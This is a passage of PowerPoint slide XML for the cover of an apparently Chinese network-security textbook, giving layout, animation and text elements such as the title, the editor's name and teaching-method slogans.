                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="39" decel="50000" autoRev="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="34" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="216"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>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 grpId="0"/>
    </p:bldLst>
  </p:timing>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图片 7" descr="V-136038-F72FEC97O"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="10000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="159385" y="-137795"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1" descr="D:\用户目录\Desktop\223.png223"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="216535" y="1415415"/>
            <a:ext cx="6368415" cy="4027805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5576570" y="1704340"/>
            <a:ext cx="4876800" cy="1009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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="dist">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="007BD3"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="034373"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin scaled="0"/>
                </a:gradFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>网络安全技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="007BD3"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="034373"/>
                  </a:gs>
                </a:gsLst>
                <a:lin scaled="0"/>
              </a:gradFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5634990" y="2847975"/>
            <a:ext cx="4752340" cy="3810"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="451485"/>
            <a:ext cx="4021455" cy="301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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>广东省首批十四五规划教材</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4624705" y="5731510"/>
            <a:ext cx="2943225" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6736715" y="4239895"/>
            <a:ext cx="2548255" cy="56007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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>主编：张燕燕</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5238115" y="3315970"/>
            <a:ext cx="5756910" cy="3219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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>课程思政</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>岗课赛证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>项目式教学</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务驱动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="蝴蝶结"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId10"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2184400" y="1409700"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="茶杯"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId12"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3098800" y="1409700"/>
            <a:ext cx="296545" cy="296545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="衣架"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId14"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4013200" y="1409700"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11" descr="新建文档"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId16"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="1791335"/>
            <a:ext cx="491490" cy="491490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId17">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId18"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2459355" y="3238500"/>
            <a:ext cx="492760" cy="492760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId19">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId20"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266315" y="1922145"/>
            <a:ext cx="408305" cy="408305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId21">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId22"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1443355" y="1761490"/>
            <a:ext cx="562610" cy="562610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
